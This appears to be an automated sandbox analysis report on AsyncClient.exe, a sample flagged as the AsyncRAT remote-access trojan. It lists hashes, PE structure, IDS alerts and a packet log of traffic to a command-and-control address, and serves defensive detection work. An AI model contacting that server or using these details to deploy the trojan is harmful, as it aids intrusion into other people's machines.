                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                          Malicious:false
                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                          Static File Info

                                                          General

                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):5.554853083093718
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:AsyncClient.exe
                                                          File size:48'640 bytes
                                                          MD5:da0c2ab9e92a4d36b177ae380e91feda
                                                          SHA1:44fb185950925ca2fcb469fbedaceee0a451cbca
                                                          SHA256:c84a91d4261563b4171103a1d72a3f86f48ec2eaca6e43d7f217bdcbc877124d
                                                          SHA512:0fc9a2f7cd1924578ed0840205162c19bcc67ad602321461d74d817344436f778d6fe54cc91f795cbed6decd65dc4d8bbc17ef969af7dd5feafec9bd7fcc1e7e
                                                          SSDEEP:768:ku/dRTUo0HQbWUnmjSmo2qMOdvbvAaQ9+EUMpPPI4/AWXXz0bjx+IBE8IIC6sGBo:ku/dRTUPE2ovbVWSQAWXX4bjgF8AIdgx
                                                          TLSH:F1233C003BE9812BF6BE4F7869F32145857AF2677603D50D2CC451DB5B23FC29A426EA
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....-e............................>.... ........@.. ....................... ............@................................

                                                          File Icon

                                                          Icon Hash:00928e8e8686b000

                                                          Static PE Info

                                                          General

                                                          Entrypoint:0x40d03e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x652DADE5 [Mon Oct 16 21:40:53 2023 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                          Entrypoint Preview

                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al

                                                          Data Directories

                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xcff00x4b.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x7ff.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x100000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                          Sections

                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000xb0440xb200bec5ab1a55848163c82bae3bfad61d40False0.5406864466292135data5.611677363417481IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0xe0000x7ff0x8000f68ce4dd77ed0bb9c1e6b31f6995d94False0.41748046875data4.88506844918463IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x100000xc0x200193ce9446f7f6cb7897c421426de2ca1False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                          Resources

                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0xe0a00x2ccdata0.43575418994413406
                                                          RT_MANIFEST0xe36c0x493exported SGML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.43381725021349277

                                                          Imports

                                                          DLLImport
                                                          mscoree.dll_CorExeMain

                                                          Network Behavior

                                                          Suricata IDS Alerts

                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-12-13T11:58:53.411663+01002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)182.64.156.12380192.168.2.849704TCP
                                                          2024-12-13T11:58:53.411663+01002030673ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)182.64.156.12380192.168.2.849704TCP
                                                          2024-12-13T11:58:53.411663+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert182.64.156.12380192.168.2.849704TCP
                                                          2024-12-13T11:58:53.411663+01002035607ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)182.64.156.12380192.168.2.849704TCP
                                                          2024-12-13T11:59:02.195658+01002842478ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s)182.64.156.12380192.168.2.849706TCP

                                                          Network Port Distribution

                                                          TCP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Dec 13, 2024 11:58:51.905158997 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:52.024955988 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:52.025084972 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:52.038139105 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:52.157933950 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:53.284528017 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:53.284557104 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:53.284601927 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:53.291718960 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:53.411663055 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:53.692540884 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:53.745203972 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:56.349673986 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:56.471170902 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:56.471287966 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:56.591296911 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.513736963 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.513781071 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.513925076 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.513942003 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.513950109 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.514329910 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.514364958 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.514374971 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.514414072 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.514553070 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.514589071 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.514630079 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.522252083 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.522289038 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.522353888 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.531085014 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.531121969 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.531205893 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.536734104 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.589004993 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.633805990 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.633934975 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.634007931 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.638185978 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.682734013 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.705600023 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.705719948 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.705780983 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.709566116 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.709692001 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.709758997 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.717606068 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.717725039 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.717797041 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.725611925 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.725789070 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.725850105 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.733647108 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.733741999 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.733795881 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.741656065 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.741775990 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.741826057 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.749686003 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.749788046 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.749849081 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.757703066 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.757827044 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.757882118 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.765759945 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.765853882 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.765918016 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.773745060 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.773900032 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.773976088 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.780246019 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.780441046 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.780497074 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.786705017 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.786815882 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.786871910 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.793138981 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.793265104 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.793320894 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.799549103 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.854589939 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.897423029 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.897542000 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.897708893 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.899811029 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.899971962 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.900024891 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.904402018 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.906126976 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.906193972 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.906232119 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.910759926 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.910819054 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.910902977 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.915458918 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.915595055 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.915640116 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.920114994 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.920177937 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.920234919 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.924216032 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.924276114 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.924324989 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.928313017 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.928380013 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.928411007 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.932476997 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.932563066 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.932573080 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.936611891 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.936690092 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.936734915 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.940685034 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.940746069 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.940787077 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.944855928 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.944912910 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.944966078 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.949007034 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.949058056 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.949100971 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.953083038 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.953125000 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.953211069 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.957250118 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.957300901 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.957350016 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.961332083 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.961378098 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.961462975 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.965459108 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.965522051 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.965593100 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.969594002 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.969644070 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.969703913 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.973752022 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:58.973817110 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:58.973862886 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.017656088 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.017695904 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.017729998 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.020056963 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.020111084 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.020221949 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.023705006 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.023758888 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.023824930 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.027952909 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.028018951 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.028101921 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.031991005 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.032032967 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.032062054 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.036082029 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.036130905 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.036233902 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.040318012 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.040389061 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.040461063 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.088952065 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.089169025 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.089252949 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.089298964 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.090811968 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.091525078 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.091562033 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.091574907 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.095027924 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.095079899 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.095105886 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.098397017 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.098460913 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.098543882 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.101978064 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.102030993 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.102144003 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.104971886 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.105026007 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.105108976 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.108412027 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.108463049 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.108531952 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.111485004 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.111542940 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.111598015 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.114694118 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.114742994 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.114825964 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.117918968 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.118083000 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.118098021 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.121186972 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.121228933 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.121314049 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.124800920 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.124846935 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.124913931 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.127808094 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.127855062 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.127932072 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.137546062 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.137605906 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.137664080 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.139981031 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.140028000 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.140096903 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.143594027 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.143646002 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.143712997 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.147999048 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.148049116 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.148520947 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.151832104 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.151887894 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.151964903 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.155881882 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.155926943 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.155993938 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.160392046 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.160435915 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.160451889 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.209271908 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.209342003 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.209368944 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.211363077 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.211409092 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.211425066 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.214895010 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.214951038 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.215013027 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.218200922 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.218255043 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.218342066 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.222039938 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.222096920 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.222098112 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.224773884 CET804970482.64.156.123192.168.2.8
                                                          Dec 13, 2024 11:58:59.224822998 CET4970480192.168.2.882.64.156.123
                                                          Dec 13, 2024 11:58:59.224879980 CET804970482.64.156.123192.168.2.8
